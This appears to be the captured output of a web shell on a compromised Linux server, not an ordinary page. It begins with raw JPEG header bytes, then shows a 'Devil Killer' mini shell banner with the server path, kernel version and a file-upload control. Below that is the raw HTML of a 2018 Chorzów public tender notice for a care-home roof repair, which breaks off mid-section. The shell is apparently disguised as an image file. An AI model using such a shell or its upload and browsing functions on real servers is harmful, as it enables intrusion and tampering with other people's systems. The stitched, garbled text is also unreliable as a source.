JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20180613/572090-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 572090-N-2018 z dnia 2018-06-13 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Miasto Chorzów, Biuro Zamówień Publicznych</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Remont dachu tarasu w Domu Pomocy Społecznej Republika przy ul. Michałkowickiej 4 w Chorzowie.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Miasto Chorzów, Biuro Zamówień Publicznych</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27625530600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Rynek</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">41500 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Chorzów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">324 165 000</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">bzp@chorzow.eu</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">32 4165639, 32 4165640</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.chorzow.eu</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.chorzow.eu</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">oferty należy składać w formie pisemnej </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miasta Chorzów, 41-500 Chorzów, Rynek 1, Biuro Zamówień Publicznych, pokój 419</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Remont dachu tarasu w Domu Pomocy Społecznej Republika przy ul. Michałkowickiej 4 w Chorzowie.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">RZP.271.551.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu"> I. Przedmiotzamówienia publicznego obejmuje: 1. roboty rozbiórkowe, 2. wykonanie warstwy jastrychu, 3. ułożeniewarstwy izolacji termicznej, 4. pokrycie dachu papą termozgrzewalną - dwukrotnie o parametrachzgodnych ze Szczegółową Specyfikacją Techniczną 04, 5. wykonanie obróbek blacharskich z blachypowlekanej. II. W ramach realizacji przedmiotu zamówienia Zamawiający wymaga: 1. Uzgodnienia zZamawiającym materiałów przeznaczonych do robót przed ich zastosowaniem. 2. Zachowania porządkuw obrębie wykonywania robót budowlanych, sprzątanie na bieżąco po robotach. 3. Utrzymywaniaobszaru robót w stanie uporządkowanym i wolnym od zbędnych przeszkód, wywożenia na bieżącomateriałów z rozbiórki we własnym zakresie i na własny koszt. 4. Zapewnienia bezpieczeństwa ppoż.oraz bezpiecznych warunków realizacji robót i przestrzegania przepisów BHP na terenie budowy. 5.Wykonywania robót zgodnie z wymogami Prawa budowlanego jak również z obowiązującymi PolskimiNormami i zasadami wiedzy technicznej oraz należytą starannością w ich wykonaniu, dobra jakością i zzachowaniem obowiązujących wymagań i przepisów BHP i ppoż. 6. Użycia materiałów posiadającychaktualne dokumenty dopuszczające do stosowania w budownictwie, w rozumieniu ustawy z dnia 16kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2014 r., poz. 883 ze zm.). 7. Wykonania prób, badańi pomiarów odbiorowych przewidzianych w specyfikacjach technicznych, warunkach technicznychwykonania i odbioru robót oraz Polskich Normach. 8. Zabezpieczenia terenu robót w sposób pewny itrwały zgodnie z wymaganiami prawa budowlanego i aktów wykonawczych. 9. Uczestniczenia wnaradach dotyczących postępu robót, zwoływanych przez Zamawiającego. 10. Jeżeli dokumentacja lubspecyfikacja techniczna wykonania i odbioru robót wskazywałaby w odniesieniu do niektórychmateriałów i urządzeń znaki towarowe lub pochodzenie, Zamawiający, zgodnie z art. 29 ust. 3 Pzp,dopuszcza oferowanie ,,produktów równoważnych". Wszelkie ,,produkty" pochodzące od konkretnychproducentów, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadaćtowary, aby spełnić wymagania stawiane przez Zamawiającego i stanowią wyłącznie wzorzec jakościowyprzedmiotu zamówienia. Poprzez zapis dot. minimalnych wymagań parametrów jakościowych,Zamawiający rozumie wymagania towarów zawarte w ogólnie dostępnych źródłach, katalogach, stronachinternetowych producentów. Operowanie przykładowymi nazwami producenta, ma na celudoprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania. Wprzypadku oferowania produktów równoważnych, Zamawiający wymaga złożenia stosownychdokumentów, uwiarygodniających te materiały lub urządzenia. Będą one podlegały ocenieZamawiającego i będą podstawą decyzji o akceptacji ,,równoważników" lub odrzuceniu oferty z powoduich ,,nierównoważności". Ciężar udowodnienia równoważności spoczywa na wykonawcy. 11. Jeżelidokumentacja lub specyfikacja techniczna wykonania i odbioru robót opisująca przedmiot zamówieniaodnosiłaby się do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemówreferencji technicznych, o których mowa w art. 30 ust. 1, pkt 2 i ust. 3 ustawy Pzp, Zamawiającydopuszcza rozwiązania równoważne opisywanym. III. Wymagania zatrudnienia przez wykonawcę lubpodwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez zamawiającegoczynności w zakresie realizacji zamówienia: 1. Zamawiający stosownie do art. 29 ust. 3a ustawy, wymagazatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonującychczynności w zakresie realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposóbokreślony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2016 r. poz. 1666, zpóźn. zm. ) 2. Sposób i okres wymaganego zatrudnienia osób realizujących czynności w zakresierealizacji zamówienia. 1) Zamawiający wymaga aby wszystkie osoby realizujące przedmiot zamówienia,które wykonywać będą czynności faktycznie związane z przedmiotem zamówienia we wszystkichbranżach, za wyjątkiem kierowników robót budowlanych, opisane w specyfikacji istotnych warunkówzamówienia zostały zatrudnione na podstawie umowy o pracę. 2) Wykonawca lub podwykonawcazatrudni wyżej wymienione osoby na okres realizacji zamówienia. W przypadku rozwiązania stosunkupracy przed zakończeniem tego okresu, zobowiązuje się do niezwłocznego zatrudnienia na to miejsceinnej osoby. 3. Sposób dokumentowania zatrudnienia ww. osób. 1) Prace objęte przedmiotem zamówieniabędą realizowane przez pracowników wykonujących czynności w trakcie realizacji zamówienia zgodnie zwykazem dostarczonym zamawiającemu łącznie z dokumentami potwierdzającymi sposób zatrudnienia wterminie 10 dni od dnia podpisania umowy. 2) Wykonawca w terminie do 10 dni licząc od dniapodpisania umowy będzie zobowiązany do przedstawienia zamawiającemu dokumentówpotwierdzających sposób zatrudnienie ww. osób, np. kopie umów o pracę zanonimizowane ( z wyjątkiemimienia i nazwiska) oświadczenie ww. osób, że są zatrudnione na podstawie umowy o pracę wrozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy z uwzględnieniem minimalnegowynagrodzenia za pracę ustalonego na podstawie ustawy z dnia 10 października 2002 r. o minimalnymwynagrodzeniu za pracę przez cały okres realizacji przedmiotu zamówienia, 4. Uprawnieniazamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań, o których mowa w art. 29 ust.3a ustawy Pzp, oraz sankcji z tytułu niespełnienia tych wymagań: 1) Wykonawca na każde pisemneżądanie zamawiającego w terminie do 5 dni roboczych przedkładał będzie zamawiającemu raport stanu isposobu zatrudnienia ww. osób, np. oświadczenia zatrudnionych osób, potwierdzającego, że wykonujączynności w zakresie realizacji zamówienia na podstawie umowy o pracę, dowody odprowadzeniaskładek ZUS, przez cały okres realizacji zamówienia. 5. Rodzaj czynności niezbędnych do realizacjizamówienia, których dotyczą wymagania zatrudnienia na podstawie umowy o pracę przez wykonawcęlub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia 1) Czynnościrobotnika opisane w przedmiarze robot. 6. Sankcje z tytułu niespełnienia wymagań w zakresiezatrudnienia. 1) W przypadku nie przedstawienia w terminie informacji, o której mowa w ust. 3 pkt 2 iust. 4 pkt 1 wykonawca będzie każdorazowo płacił zamawiającemu karę w wysokości 300,00 PLN. 2) Wprzypadku dwukrotnego nie wywiązania się z obowiązku wskazanego ust. 3 pkt 2 i ust. 4 pkt 1 lubzmiany sposobu zatrudnienia osób wskazanych w wykazie, zamawiający ma prawo od umowy odstąpić wterminie 30 dni od dnia dowiedzenia się o zdarzeniu opisanym wyżej i naliczyć karę umowną zaodstąpienie od umowy w wysokości 10% wartości zamówienia o którym mowa w §3 ust. 1 wzoru umowyoraz naliczyć dodatkowo kary umowne wskazane w ust. 6 pkt 1) i 3). 3) W przypadku niezatrudnieniaprzy realizacji zamówienia osób wykonujących czynności robotnika opisane w przedmiarze robot napodstawie umowy o pracę lub zmiany sposobu zatrudnienia osób wykonujących te czynności w trakcierealizacji zamówienia, wykonawca będzie zobowiązany do zapłacenia kary umownej zamawiającemu, wwysokości 1000,00 zł , za każdą osobą zatrudnioną w sposób niezgodny z wymaganiami określonymi wSIWZ. 4) W uzasadnionych przypadkach, nie z przyczyn leżących po stronie wykonawcy, możliwe jestzastąpienie ww. osoby lub osób innymi osobami pod warunkiem, że spełnione zostaną wszystkiepowyższe wymagania co do sposobu zatrudnienia na okres realizacji zamówienia określone w SIWZ, conie wymaga sporządzenia aneksu do umowy, tylko przedłożenia zamawiającemu pisemnej informacji.Roboty budowlane należy wykonać zgodnie z załączonym przedmiarem robót i specyfikacją techniczną.Wykonanie zadania zapewni dostosowanie obiektu do potrzeb wszystkich użytkowników, w tymzapewnienia dostępności dla osób niepełnosprawnych. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45260000-0</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"> Zamawiający przewidujemożliwość udzielenia zamówień polegających na powtórzeniu podobnych robot budowlanych co wzamówieniu podstawowym, o których mowa w artykule 67 ust. 1 pkt. 6 ustawy Pzp, stanowiących niewięcej niż 30% wartości zamówienia podstawowego. Zakres robót polegać będzie na powtórzeniupodobnych robót budowlanych, co w zamówieniu podstawowym i zgodnych z przedmiotem zamówieniapodstawowego tj. : 1. roboty rozbiórkowe, 2. wykonanie warstwy jastrychu, 3. ułożenie warstwy izolacjitermicznej, 4. pokrycie dachu papą termozgrzewalną , 5. wykonanie obróbek blacharskich z blachypowlekanej. Warunki udzielenia zamówienia, o którym mowa art. 67 ust. 1 pkt 6 ustawy Pzp: cenazostanie ustalona z zastosowaniem wskaźników cenotwórczych oferowanych w zamówieniupodstawowym, tj. stawki roboczogodziny ( z zastrzeżeniem dopuszczalnych zmian umowy w zakresiewynagrodzenia) i narzutów: kosztów pośrednich, kosztów zakupu i zysku</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">2</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">do 2 miesięcy od daty przekazania placu budowy Przekazanie placu budowy do 5 dni roboczych od daty zawarcia umowy </span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tegowarunku. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (wg wzoruzałącznika nr 1 do SIWZ). </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> 